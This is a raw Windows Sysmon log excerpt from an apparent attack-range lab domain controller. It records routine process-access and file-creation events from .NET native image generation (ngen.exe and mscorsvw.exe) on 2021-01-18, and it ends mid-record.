13:44:55.345{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-90D7-6005-5501-00000000A301}4896C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005543Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:55.329{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-90D7-6005-5501-00000000A301}4896C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005542Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:55.329{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-90D7-6005-5501-00000000A301}4896C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000005541Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:44:55.267{59A5CD1D-90D6-6005-5401-00000000A301}2960C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\b90-0\System.Transactions.dll2021-01-18 13:44:55.267 10341000x80000000000000005565Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:57.954{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-90D9-6005-5B01-00000000A301}4252C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005564Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:57.939{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-90D9-6005-5B01-00000000A301}4252C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005563Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:57.939{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-90D9-6005-5B01-00000000A301}4252C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000005562Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:44:57.876{59A5CD1D-90D9-6005-5A01-00000000A301}4636C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\121c-0\System.Configuration.Install.dll2021-01-18 13:44:57.876 10341000x80000000000000005561Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:57.751{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-90D9-6005-5A01-00000000A301}4636C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005560Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:57.736{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-90D9-6005-5A01-00000000A301}4636C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005559Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:57.736{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-90D9-6005-5A01-00000000A301}4636C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005558Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:57.642{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-90D9-6005-5901-00000000A301}4792C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005557Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:57.626{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-90D9-6005-5901-00000000A301}4792C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005556Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:57.626{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-90D9-6005-5901-00000000A301}4792C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000005555Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:44:57.564{59A5CD1D-90D9-6005-5801-00000000A301}4884C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1314-0\CustomMarshalers.dll2021-01-18 13:44:57.564 10341000x80000000000000005554Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:57.470{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-90D9-6005-5801-00000000A301}4884C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005553Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:57.470{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-90D9-6005-5801-00000000A301}4884C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005552Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:57.470{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-90D9-6005-5801-00000000A301}4884C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005551Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:57.423{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-90D9-6005-5701-00000000A301}3816C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005550Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:57.423{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-90D9-6005-5701-00000000A301}3816C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005549Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:57.423{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-90D9-6005-5701-00000000A301}3816C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000005548Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:44:57.314{59A5CD1D-90D7-6005-5601-00000000A301}3060C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\bf4-0\System.Web.Services.dll2021-01-18 13:44:57.314 10341000x80000000000000005568Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:58.033{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-90DA-6005-5C01-00000000A301}3088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005567Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:58.017{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-90DA-6005-5C01-00000000A301}3088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005566Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:58.017{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-90DA-6005-5C01-00000000A301}3088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005575Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:59.704{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-90DB-6005-5E01-00000000A301}2240C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005574Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:59.704{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-90DB-6005-5E01-00000000A301}2240C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005573Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:59.704{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-90DB-6005-5E01-00000000A301}2240C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005572Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 